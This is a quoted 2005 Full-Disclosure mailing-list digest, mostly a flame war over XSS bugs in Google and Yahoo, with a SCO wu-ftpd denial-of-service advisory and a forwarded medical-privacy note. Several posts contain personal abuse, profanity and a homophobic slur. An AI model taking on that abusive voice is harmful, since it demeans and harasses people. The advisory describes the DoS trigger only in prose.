>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: "n3td3v" <xploitable@...il.com>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <017701c60655$8263e750$0100a8c0@...learwinter>
>Content-Type: text/plain; charset="iso-8859-1"
>
>lol you wont ever give up kiddie dont you ?
>i do not care about google and yahoo vulnerabilities.
>i agree to leave you alone, but you ask for it again and again so be it.
>1 person said its ok for the xss vuln. you cant even count or did you see
>any
>other mails ? how about the tons of people the constantly tell you to shut
>the fuck up
>since we are all tired of you. you say the same shit over and over again.
>if someone tells you facts then you ignore it, because you have no other
>arguments as that
>someone else wouldnt have found lame xss bugs in google or yahoo and
>therefore they shouldnt
>be allowed on this list. you are the last person to even dare to say
>something like this.
>you have nothing else to say then that people would be jealous of you or
>how precious
>your lame xss bugs are. noone cares about your shitty vulnerabilities you
>found as it doesnt
>require any skill at all to find those. show us some code! how many
>exploits did you write ?
>you are so blinded by your ego that you dont realize how much crap you talk
>and how you
>destory your imaginary reputation yourself. why do you think there have
>been so many mails against you?
>its not because of your xss lameness. if you would have simply provided
>them to the list noone would have
>bothered, but you have to brag how special they would make you. then you
>think you would be one
>of the most respected security researchers out there, but noone knows you.
>you are so pathetic its unbeliveable.
>pull the stick out of your ass and get lost kid.
>
>----- Original Message -----
>From: "n3td3v" <xploitable@...il.com>
>To: "GroundZero Security" <fd@....org>; <full-disclosure@...ts.grok.org.uk>
>Sent: Wednesday, December 21, 2005 6:16 PM
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>
>
> > You trolled this thread by saying Watchfire should stop disclosing
> > vulnerabilities for Yahoo and Google. You get the response you
> > deserved to get. Now you're running off the thread now with your tail
> > between your legs, because everyone has told you that Google and Yahoo
> > vulnerabilities (especially XSS) will never be banned from FD.
> >
> >
> > On 12/21/05, GroundZero Security <fd@....org> wrote:
> > > yes you are right, but its like if noone tells him what a stupid fag
>he is,
> > > he will keep posting and posting his irrelevant crap and just ignore
>the tons of private
> > > mail he receives. i'm sorry for adding to the noise, but its just too
>tempting.
> > > i try to ignore it. but i cant promise i will, the last mail he sent
>just asks for a reply :P
> > > but ok...must...resist.....
> > > btw my name is not groundzero, thats my company :)
> > >
> > > greetz
> > > -sk
> >
>
>
>------------------------------
>
>Message: 11
>Date: Wed, 21 Dec 2005 18:47:42 +0100
>From: Peer Janssen <peer@...en-online.de>
>Subject: [Full-disclosure] Character vulnerabilities
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <43A9953E.4020502@...en-online.de>
>Content-Type: text/plain; charset=us-ascii; format=flowed
>
>Hi list,
>
>I read so many postings on this list of people who seemingly do not
>control their anger, fury etc. which seems to bump their heads straight
>at their ceilings.
>
>Do you really consider this as qualities of a security
>researcher/consultant/employee/...?
>
>I'd rather consider them vulnerabilities which might expose them to
>social engineering attacks or to being blinded by their own rage, which
>can easily result in destructive carelessness in many areas.
>
>I don't think that it makes a good publicity for a company to work with
>security people not mastering themselves. Why would you entrust them
>with your systems if they react so emotionally? Shouldn't they rather be
>clear-minded, rational, controlling themselves, etc., when dealing in
>any way with security issues?
>
>So please, do yourself and those around you a favor and change; you CAN
>do it, and you will make everybody happier, and youself more efficient,
>if happyness is not your thing.
>
>So cheer up, and take it a bit more easily!
>Peer
>
>
>
>------------------------------
>
>Message: 12
>Date: Wed, 21 Dec 2005 18:48:52 +0100
>From: fok yo <yoo.fok@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: n3td3v <xploitable@...il.com>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <cd8f1f1e0512210948t3abdd6a8o@...l.gmail.com>
>Content-Type: text/plain; charset="iso-8859-1"
>
>You just don't get it, do you....
>The problem isn't xss bugs are the uberlamest, the problem is you reserve
>yourself the right to _spam_ us 24/7 by bragging about how once you found a
>half-ass xss yourself.
>Your signal to noise ratio is simply too low to be bearable.
>
>YOU HAVEN'T ADDED ANY *INTERESTING* SECURITY RELATED CONTENT TO THE LIST,
>EVER.
>YOU ARE USELESS TO THE SECURITY COMMUNITY AS A WHOLE.
>STOP REPLYING TO FD BECAUSE YOU ANNOY 99,99% OF US.
>WE DON'T NEED ANOTHER WANNABE.
>YOU WASTE OUR TIME.
>
>+ you are __very stupid__, you obviously lack the insight to be the top
>notch security pro you think you are, try something else, it's just not
>worth it, piece of fuckup.
>+ what's your real name? Stop hiding behind a nick and step into the
>ligths....
>+According to the way you express yourself through email (very simple
>language/grammar, especially for a native english speaker, bragging
>and trying to prove yourself without valid arguments, not going to the core
>of a discussion but trying to hide yourself after the image you think you
>created, ... ) , it's obvious you lack any social skills, stop wasting your
>time in front of the computer, find a date for new year's eve, coz it'll
>be cold and lonely.
>
>
>2005/12/21, n3td3v <xploitable@...il.com>:
> >
> > You trolled this thread by saying Watchfire should stop disclosing
> > vulnerabilities for Yahoo and Google. You get the response you
> > deserved to get. Now you're running off the thread now with your tail
> > between your legs, because everyone has told you that Google and Yahoo
> > vulnerabilities (especially XSS) will never be banned from FD.
> >
> >
> > On 12/21/05, GroundZero Security <fd@....org> wrote:
> > > yes you are right, but its like if noone tells him what a stupid fag
>he
> > is,
> > > he will keep posting and posting his irrelevant crap and just ignore
>the
> > tons of private
> > > mail he receives. i'm sorry for adding to the noise, but its just too
> > tempting.
> > > i try to ignore it. but i cant promise i will, the last mail he sent
> > just asks for a reply :P
> > > but ok...must...resist.....
> > > btw my name is not groundzero, thats my company :)
> > >
> > > greetz
> > > -sk
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>-------------- next part --------------
>An HTML attachment was scrubbed...
>URL:
>http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051221/3b9022b2/attachment-0001.html
>
>------------------------------
>
>Message: 13
>Date: Wed, 21 Dec 2005 11:54:05 -0600 (CST)
>From: "J.A. Terranson" <measl@....org>
>Subject: [Full-disclosure] [EMED-L] Patriot Act and HIPPA (fwd)
>To: Full-Disclosure <Full-Disclosure@...ts.grok.org.uk>
>Cc: antisocial@....org, "cypherpunks@...qaeda.net"
> <cypherpunks@...qaeda.net>
>Message-ID: <20051221115344.H37487@...r.zsa.bet>
>Content-Type: TEXT/PLAIN; charset=US-ASCII
>
>
>Take note people!
>
>--
>Yours,
>
>J.A. Terranson
>sysadmin@....org
>0xBD4A95BF
>
>
> Just once, can't we have a nice polite discussion about
> the logistics and planning side of large criminal enterprise?
>
> - Steve Thompson
>
>
>
>---------- Forwarded message ----------
>Date: Wed, 21 Dec 2005 12:10:59 -0500
>From: Jeanne Lenzer <jeanne.lenzer@...IL.COM>
>Reply-To: EMED-L -- a list for emergency medicine practitioners.
> <EMED-L@...SRV1.UCSF.EDU>
>To: EMED-L@...SRV1.UCSF.EDU
>Subject: [EMED-L] Patriot Act and HIPPA
>
>Could anyone on this listserve who has seen anything like what follows
>below, please contact me off-list immediately jeanne.lenzer@...thlink.net
>(for background or for attribution - your choice).
>
>Thanks, Jeanne
>
>
>
>A patient was handed a medical information rights and disclosure booklet
>she got from her doctor. It lists the folks that they might
>release medical information to for various reasons (health department,
>lawyers and courts because of subpoena, law enforcement officials,
>coroners,
>medical examiners, funeral directors, etc.).
>Below them, there is this graph:
>
>Protective Services for the President, National Security and Intelligence
>Activities:
>We may disclose medical information about you to authorized federal
>officials so they may without limitation (i) provide protection to the
>President, other authorized persons or foreign heads of state or conduct
>special investigations, or (ii) conduct lawful intelligence,
>counter-intelligence, or other national security activities authorized by
>law.
>
>
>
>
>
>__________
>
>
>
>Jeanne Lenzer
>
>Freelance journalist
>
>11 Len Court
>
>Kingston, NY 12401
>
>USA
>
>jeanne.lenzer@...thlink.net
>
>845.943.6202 office
>
>203.300.7136 cell
>
>
>
>To unsubscribe, send the command "SIGNOFF EMED-L" to
>LISTSERV@...SRV1.UCSF.EDU
>
>
>------------------------------
>
>Message: 14
>Date: Wed, 21 Dec 2005 18:57:18 +0100
>From: Slythers Bro <slythers@...il.com>
>Subject: Re: [Full-disclosure] Firewall (The Movie) -
> http://firewallmovie.warnerbros.com/cmp/trailer.html?id=trailer
>To: Dave McCormick <mccormic@...u.net>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID:
> <8f6a58a30512210957v689c9804p373ec1febeef360d@...l.gmail.com>
>Content-Type: text/plain; charset="iso-8859-1"
>
>this movie seem to sux
>-------------- next part --------------
>An HTML attachment was scrubbed...
>URL:
>http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051221/c9ae0fc4/attachment-0001.html
>
>------------------------------
>
>Message: 15
>Date: Wed, 21 Dec 2005 17:58:27 +0000
>From: n3td3v <xploitable@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: Edward Pearson <Ed@...tymail.co.uk>,
> full-disclosure@...ts.grok.org.uk
>Message-ID:
> <4b6ee9310512210958p1775afb9g15f059db7775a6e@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>I release information about Yahoo and Google, I don't see how my name
>goes in the same list as GroundZero and InfoSecBOFH. All i'm doing is
>defending Yahoo and Google researchers from being told not to disclose
>vulnerabilities on FD, is that such a bad thing?
>
>On 12/21/05, Edward Pearson <Ed@...tymail.co.uk> wrote:
> > Why has this become a trolling?
> > "if noone tell him what a stupid fag he is"
> > Are we back at fucking middle school? Have we decended to the level of
> > 10 year olds??
> >
> > Ground Zero, I've seen your company website(s) and your products. All I
> > say is I think you have several very good resons to pay FUCKING close
> > attention to what is said on this list. Work it out.
> >
> > The only people who seem hell bent on ruining this list for everyone
> > are:
> > InfoSecBOFH
> > n3td3v
> > Ground Zero Security
> >
> > None of these people have anything to bring to the table.
> > Lets see at least one real vuln report/exploit from one of you, and then
> > the other two have to concentrate on growing up enough to not troll it
> > or make stupid pre-school comments.
> >
> > Come on guys!!! I'm beginning to thing that actually you're not bigger
> > than this...
> >
> > Ultimatly, if you've got problems with each other, do it on MSN, AIM,
> > IRC, USENET whatever, just not my inbox.
> >
> > Have a fucking excellent day.
> >
> > - Ed (BTW, Ground Zero's has my alais since 1995, now I see that this
> > chump is going round putting a black mark by it)
> >
> > -----Original Message-----e
> > From: full-disclosure-bounces@...ts.grok.org.uk
> > [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of n3td3v
> > Sent: 21 December 2005 17:17
> > To: GroundZero Security; full-disclosure@...ts.grok.org.uk
> > Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
> >
> > You trolled this thread by saying Watchfire should stop disclosing
> > vulnerabilities for Yahoo and Google. You get the response you deserved
> > to get. Now you're running off the thread now with your tail between
> > your legs, because everyone has told you that Google and Yahoo
> > vulnerabilities (especially XSS) will never be banned from FD.
> >
> >
> > On 12/21/05, GroundZero Security <fd@....org> wrote:
> > > yes you are right, but its like if noone tells him what a stupid fag
> > > he is, he will keep posting and posting his irrelevant crap and just
> > > ignore the tons of private mail he receives. i'm sorry for adding to
> > the noise, but its just too tempting.
> > > i try to ignore it. but i cant promise i will, the last mail he sent
> > > just asks for a reply :P but ok...must...resist.....
> > > btw my name is not groundzero, thats my company :)
> > >
> > > greetz
> > > -sk
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>------------------------------
>
>Message: 16
>Date: Wed, 21 Dec 2005 12:58:32 -0500
>From: "KF (lists)" <kf_lists@...italmunition.com>
>Subject: Re: [Full-disclosure] SCOSA-2005.63 OpenServer 5.0.6
> OpenServer 5.0.7 OpenServer 6.0.0 : wu-ftp Denial of Service
> Vulnerability
>To: full-disclosure@...ts.grok.org.uk
>Cc: security-announce@...t.sco.com
>Message-ID: <43A997C8.1090903@...italmunition.com>
>Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
>How about you retards upgrade your own production ftp servers before
>sending out an another wu advisory...
>
>Seriously.... how many years can you leave this box unpatched? Look like
>you JUST released yet an nother patch that you can apply to it...
>
>ftp ftpput.sco.com
>Connected to ftpput.sco.com.
>220 artemis FTP server (Version 2.1WU(1)) ready.
>Name (ftpput.sco.com:kfinisterre):
>
>-KF
>
>security@....com wrote:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> >
>______________________________________________________________________________
> >
> >
> > SCO Security Advisory
> >
> > Subject: OpenServer 5.0.6 OpenServer 5.0.7 OpenServer 6.0.0 :
> > wu-ftp Denial of Service Vulnerability
> > Advisory number: SCOSA-2005.63
> > Issue date: 2005 December 21
> > Cross reference: sr893936 fz532335 erg712856
> > sr895049 fz533027 erg712952
> > CVE-2005-0256
> >
>______________________________________________________________________________
> >
> >
> >
> > 1. Problem Description
> >
> > The wu_fnmatch function in wu_fnmatch.c allows remote attackers
> > to cause a denial of service (CPU exhaustion by recursion) via a
> > glob pattern with a large number of * (wildcard) characters, as
> > demonstrated using the dir command.
> >
> > The Common Vulnerabilities and Exposures project (cve.mitre.org)
> > has assigned the following name CVE-2005-0256 to this issue.
> >
> >
> > 2. Vulnerable Supported Versions
> >
> > System Binaries
> >
>----------------------------------------------------------------------
> >
> > OpenServer 5.0.6 /etc/ftpd
> > OpenServer 5.0.7 /etc/ftpd
> > OpenServer 6.0.0 /etc/ftpd
> >
> >
> > 3. Solution
> >
> > The proper solution is to install the latest packages.
> >
> >
> > 4. OpenServer 5.0.6
> >
> > 4.1 Location of Fixed Binaries
> >
> > ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.63
> >
> >
> > 4.2 Verification
> >
> > MD5 (p532335.506_vol.tar) = 89ea2ed1f88da6721bd73c3889f9ac0c
> >
> > md5 is available for download from
> > ftp://ftp.sco.com/pub/security/tools
> >
> >
> > 4.3 Installing Fixed Binaries
> >
> > The following package should be installed on your system before you
> > install this fix:
> >
> > OSS646C
> >
> > Upgrade the affected binaries with the following sequence:
> >
> > 1) Download p532335.506_vol.tar to a directory.
> >
> > 2) Extract VOL* files.
> >
> > # tar xvf p532335.506_vol.tar
> >
> > 3) Run the custom command, specify an install
> > from media images, and specify the directory as
> > the location of the images.
> >
> >
> > 5. OpenServer 5.0.7
> >
> > 5.1 Location of Fixed Binaries
> >
> > The fixes are only available in SCO OpenServer Release 5.0.7
> > Maintenance Pack 4 or later.
> >
> > ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4_vol.tar
> >
> >
> > 5.2 Verification
> >
> > MD5 (osr507mp4_vol.tar) = 4c87d840ff5b43221258547d19030228
> >
> > md5 is available for download from
> > ftp://ftp.sco.com/pub/security/tools
> >
> >
> > 5.3 Installing Fixed Binaries
> >
> > See the SCO OpenServer Release 5.0.7 Maintenance Pack 4 Release
> > and Installation Notes:
> >
> > ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm
> >
> >
> > 6. OpenServer 6.0.0
> >
> > 6.1 Location of Fixed Binaries
> >
> > ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.63
> >
> >
> > 6.2 Verification
> >
> > MD5 (p533027.600_vol.tar) = d939cb729d115c9bef2d2032903f2125
> >
> > md5 is available for download from
> > ftp://ftp.sco.com/pub/security/tools
> >
> >
> > 6.3 Installing Fixed Binaries
> >
> > Upgrade the affected binaries with the following sequence:
> >
> > 1) Download p533027.600_vol.tar to a directory.
> >
> > 2) Extract VOL* files.
> >
> > # tar xvf p533027.600_vol.tar
> >
> > 3) Run the custom command, specify an install
> > from media images, and specify the directory as
> > the location of the images.
> >
> >
> > 7. References
> >
> > Specific references for this advisory:
> > http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0256
> >
> >
>http://www.idefense.com/application/poi/display?id=207&type=vulnerabilities
> >
> >
> > SCO security resources:
> > http://www.sco.com/support/security/index.html
> >
> > SCO security advisories via email
> > http://www.sco.com/support/forums/security.html
> >
> > This security fix closes SCO incidents sr893936 fz532335
> > erg712856 sr895049 fz533027 erg712952.
> >
> >
> > 8. Disclaimer
> >
> > SCO is not responsible for the misuse of any of the information
> > we provide on this website and/or through our security
> > advisories. Our advisories are a service to our customers
> > intended to promote secure installation and use of SCO
> > products.
> >
> >
> > 9. Acknowledgments
> >
> > SCO would like to thank Adam Zabrocki.
> >
> >
>______________________________________________________________________________
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.4.2 (UnixWare)
> >
> > iD8DBQFDqYDTaqoBO7ipriERAtzOAJ0ctD8xRYQrLkkgyHsMqCvfQdPBFQCeIgx7
> > xqqmzQCNiw6t+WtSL5rqo4E=
> > =ha4X
> > -----END PGP SIGNATURE-----
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
>
>
>
>------------------------------
>
>Message: 17
>Date: Wed, 21 Dec 2005 11:09:08 -0700
>From: "wilder_jeff Wilder" <wilder_jeff@....com>
>Subject: RE: [Full-disclosure] Character vulnerabilities
>To: peer@...en-online.de, full-disclosure@...ts.grok.org.uk
>Message-ID: <BAY106-F7F86FB6686789F08B721B94310@....gbl>
>Content-Type: text/plain; format=flowed
>
><begin applause>
>
> WOOO HOOOOO!!!!! I'll second that
>
></begin applause>
>
>
>
>
>-Jeff Wilder
>CISSP,CCE,C/EH
>
>
>
>-----BEGIN GEEK CODE BLOCK-----
> Version: 3.1
> GIT/CM/CS/O d- s:+ a C+++ UH++ P L++ E- w-- N+++ o-- K- w O- M--
> V-- PS+ PE- Y++ PGP++ t+ 5- X-- R* tv b++ DI++ D++
> G e* h--- r- y+++*
>------END GEEK CODE BLOCK------
>
>
>
>
>
> >From: Peer Janssen <peer@...en-online.de>
> >Reply-To: peer@...en-online.de
> >To: full-disclosure@...ts.grok.org.uk
> >Subject: [Full-disclosure] Character vulnerabilities
> >Date: Wed, 21 Dec 2005 18:47:42 +0100
> >MIME-Version: 1.0
> >Received: from lists.grok.org.uk ([195.184.125.51]) by
> >bay0-mc12-f11.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Wed,
> >21 Dec 2005 09:51:14 -0800
> >Received: from lists.grok.org.uk (localhost [127.0.0.1])by
> >lists.grok.org.uk (Postfix) with ESMTP id 2998311E1;Wed, 21 Dec 2005
> >17:47:48 +0000 (GMT)
> >Received: from moutng.kundenserver.de
> >(moutng.kundenserver.de[212.227.126.177])by lists.grok.org.uk (Postfix)
> >with ESMTP id A1AFA1035for <full-disclosure@...ts.grok.org.uk>;Wed, 21
>Dec
> >2005 17:47:33 +0000 (GMT)
> >Received: from [84.162.202.209] (helo=[192.168.0.4])by
> >mrelayeu.kundenserver.de (node=mrelayeu3) with ESMTP (Nemesis),id
> >0MKxQS-1Ep83p13dR-0000lC; Wed, 21 Dec 2005 18:47:33 +0100
> >X-Message-Info: JGTYoYF78jHTlqJP6fYdQM6aP3lvEevT7GTXFU12H84=
> >X-Original-To: full-disclosure@...ts.grok.org.uk
> >Delivered-To: full-disclosure@...ts.grok.org.uk
> >User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US;rv:1.7.8)
>Gecko/20050927
> >Debian/1.7.8-1sarge3
> >X-Accept-Language: de, de-de, en-us, en, fr, he, ar
> >X-Provags-ID: kundenserver.de
> >abuse@...denserver.delogin:45dff816f45a21d2ed442f6d1b2646c7
> >X-BeenThere: full-disclosure@...ts.grok.org.uk
> >X-Mailman-Version: 2.1.5
> >Precedence: list
> >List-Id: An unmoderated mailing list for the discussion of security
> >issues<full-disclosure.lists.grok.org.uk>
> >List-Unsubscribe:
> ><https://lists.grok.org.uk/mailman/listinfo/full-disclosure>,
> ><mailto:full-disclosure-request@...ts.grok.org.uk?subject=unsubscribe>
> >List-Archive: <http://lists.grok.org.uk/pipermail/full-disclosure>
> >List-Post: <mailto:full-disclosure@...ts.grok.org.uk>
> >List-Help:
><mailto:full-disclosure-request@...ts.grok.org.uk?subject=help>
> >List-Subscribe:
> ><https://lists.grok.org.uk/mailman/listinfo/full-disclosure>,
> ><mailto:full-disclosure-request@...ts.grok.org.uk?subject=subscribe>
> >Errors-To: full-disclosure-bounces@...ts.grok.org.uk
> >Return-Path: full-disclosure-bounces@...ts.grok.org.uk
> >X-OriginalArrivalTime: 21 Dec 2005 17:51:16.0430 (UTC)
> >FILETIME=[241ADEE0:01C60657]
> >
> >Hi list,
> >
> >I read so many postings on this list of people who seemingly do not
>control
> >their anger, fury etc. which seems to bump their heads straight at their
> >ceilings.
> >
> >Do you really consider this as qualities of a security
> >researcher/consultant/employee/...?
> >
> >I'd rather consider them vulnerabilities which might expose them to
>social
> >engineering attacks or to being blinded by their own rage, which can
>easily
> >result in destructive carelessness in many areas.
> >
> >I don't think that it makes a good publicity for a company to work with
> >security people not mastering themselves. Why would you entrust them with
> >your systems if they react so emotionally? Shouldn't they rather be
> >clear-minded, rational, controlling themselves, etc., when dealing in any
> >way with security issues?
> >
> >So please, do yourself and those around you a favor and change; you CAN
>do
> >it, and you will make everybody happier, and youself more efficient, if
> >happyness is not your thing.
> >
> >So cheer up, and take it a bit more easily!
> >Peer
> >
> >_______________________________________________
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
>------------------------------
>
>Message: 18
>Date: Wed, 21 Dec 2005 19:14:28 +0100
>From: "GroundZero Security" <fd@....org>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: "Edward Pearson" <Ed@...tymail.co.uk>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <019601c6065a$63bf69f0$0100a8c0@...learwinter>
>Content-Type: text/plain; charset="iso-8859-1"
>
>i did provide a real exploit before here and before you
>point the finger on others, we didnt see anything coming from you at all
>did we ?
>
>----- Original Message -----
>From: "Edward Pearson" <Ed@...tymail.co.uk>
>To: <full-disclosure@...ts.grok.org.uk>
>Sent: Wednesday, December 21, 2005 6:41 PM
>Subject: RE: [Full-disclosure] XSS vulnerabilities in Google.com
>
>
> > Why has this become a trolling?
> > "if noone tell him what a stupid fag he is"
> > Are we back at fucking middle school? Have we decended to the level of
> > 10 year olds??
> >
> > Ground Zero, I've seen your company website(s) and your products. All I
> > say is I think you have several very good resons to pay FUCKING close
> > attention to what is said on this list. Work it out.
> >
> > The only people who seem hell bent on ruining this list for everyone
> > are:
> > InfoSecBOFH
> > n3td3v
> > Ground Zero Security
> >
> > None of these people have anything to bring to the table.
> > Lets see at least one real vuln report/exploit from one of you, and then
> > the other two have to concentrate on growing up enough to not troll it
> > or make stupid pre-school comments.
> >
> > Come on guys!!! I'm beginning to thing that actually you're not bigger
> > than this...
> >
> > Ultimatly, if you've got problems with each other, do it on MSN, AIM,
> > IRC, USENET whatever, just not my inbox.
> >
> > Have a fucking excellent day.
> >
> > - Ed (BTW, Ground Zero's has my alais since 1995, now I see that this
> > chump is going round putting a black mark by it)
> >
> > -----Original Message-----e
> > From: full-disclosure-bounces@...ts.grok.org.uk
> > [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of n3td3v
> > Sent: 21 December 2005 17:17
> > To: GroundZero Security; full-disclosure@...ts.grok.org.uk
> > Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
> >
> > You trolled this thread by saying Watchfire should stop disclosing
> > vulnerabilities for Yahoo and Google. You get the response you deserved
> > to get. Now you're running off the thread now with your tail between
> > your legs, because everyone has told you that Google and Yahoo
> > vulnerabilities (especially XSS) will never be banned from FD.
> >
> >
> > On 12/21/05, GroundZero Security <fd@....org> wrote:
> > > yes you are right, but its like if noone tells him what a stupid fag
> > > he is, he will keep posting and posting his irrelevant crap and just
> > > ignore the tons of private mail he receives. i'm sorry for adding to
> > the noise, but its just too tempting.
> > > i try to ignore it. but i cant promise i will, the last mail he sent
> > > just asks for a reply :P but ok...must...resist.....
> > > btw my name is not groundzero, thats my company :)
> > >
> > > greetz
> > > -sk
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>------------------------------
>
>Message: 19
>Date: Wed, 21 Dec 2005 18:24:33 +0000
>From: n3td3v <xploitable@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: GroundZero Security <fd@....org>,
> full-disclosure@...ts.grok.org.uk
>Message-ID:
> <4b6ee9310512211024m31d67709mc40a53b89fb05923@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>Its a disgrace that its come to people like GroundZero knocking
>others, I really do. You've never disclosed any vulnerabilities, yet
>you think you can tell other people not to post their own just because
>you so happen to think its lame. Pathetic.
>
>On 12/21/05, GroundZero Security <fd@....org> wrote:
> > i did provide a real exploit before here and before you
> > point the finger on others, we didnt see anything coming from you at all
>did we ?
>
>
>------------------------------
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
>End of Full-Disclosure Digest, Vol 10, Issue 70
>***********************************************
_________________________________________________________________
Spam filtresi ile virüslere karsi en güvenilir koruma, MSN PC Koruma'dan
geçer. http://www.msn.com.tr/security/
Powered by blists - more mailing lists